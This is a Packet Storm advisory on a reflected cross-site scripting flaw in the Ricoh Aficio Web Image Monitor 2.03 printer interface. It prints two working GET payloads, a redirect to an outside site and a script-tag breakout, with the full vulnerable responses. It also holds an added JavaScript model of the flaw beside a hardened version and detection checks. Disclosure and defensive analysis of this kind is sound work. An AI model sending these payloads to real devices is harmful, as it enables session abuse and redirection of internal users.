Ricoh Aficio Web Image Monitor 2.03 Cross Site Scripting

2010-11-11T00:00:00
ID PACKETSTORM:95729
Type packetstorm
Reporter The Light Cosine
Modified 2010-11-11T00:00:00

Description

I was poking at some Ricoh MFPs several days ago, when I found this. It is
nothing to get too terribly excited about as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:
  
  
Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are HTML
encoded for your protection.
  
Fun with Redirects:  
  
My initial test was just an abuse of the redirect functionality that is being
exploited for the vector.
  
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>
  
  
  
A more traditional XSS test will still work just as well of course:  
  
  
Traditional Test:  
  
GET /?--></script><script>alert(51494)</script> HTTP/1.1

HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
  
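Both responses show the same root cause: the raw query string is dropped into the string literal that jumpPage() assigns to location.href. The following is an added model of that page generation, not Ricoh's firmware code, beside a hardened version and two checks a defender can run over the rendered HTML; the function names are hypothetical and the two payloads are the advisory's own query strings.

```javascript
// Added example, not Ricoh's code: models how the landing page builds its
// jumpPage() script from the raw query string, beside a hardened version.
// renderVulnerable, renderHardened, scriptElementCount and resolveRedirect
// are hypothetical names chosen for this illustration.
const MAINFRAME = "/web/guest/en/websys/webArch/mainFrame.cgi?";

// The two query strings from the advisory, used here as test inputs.
const PAYLOAD_REDIRECT = '";location.href="http://cosine-security.blogspot.com';
const PAYLOAD_SCRIPT = '--></script><script>alert(51494)</script>';

// Vulnerable: the query string is concatenated into a JS string literal.
// A '"' in the input ends the literal early; '</script>' ends the element.
function renderVulnerable(query) {
  return '<script>\nfunction jumpPage(){\nlocation.href="' + MAINFRAME + query +
    '";\n}\n</script>';
}

// Hardened: emit the target as a JSON string literal (escapes '"' and '\'),
// then unicode-escape '<' and '>' so the HTML tokenizer never sees a tag
// boundary inside the script, whatever the query string contains.
function jsStringLiteral(value) {
  return JSON.stringify(value).replace(/</g, "\\u003c").replace(/>/g, "\\u003e");
}
function renderHardened(query) {
  return '<script>\nfunction jumpPage(){\nlocation.href=' +
    jsStringLiteral(MAINFRAME + query) + ';\n}\n</script>';
}

// Check 1: how many <script> elements does the HTML tokenizer see? More than
// one means the reflected input closed the original script element.
function scriptElementCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Check 2: run the first script element's jumpPage() against a fake location
// object and report where it navigates; null means the script no longer parses.
function resolveRedirect(html) {
  const body = /<script>([\s\S]*?)<\/script>/i.exec(html)[1];
  const location = { href: "" };
  try {
    new Function("location", body + "\njumpPage();")(location);
  } catch (e) {
    if (e instanceof SyntaxError) return null;
    throw e;
  }
  return location.href;
}
```

Against PAYLOAD_REDIRECT the vulnerable page navigates to the attacker's host while the hardened page keeps that text inert inside the string; against PAYLOAD_SCRIPT the vulnerable page yields two script elements (the original one no longer parses, the injected one runs) while the hardened page yields one.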
  
The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html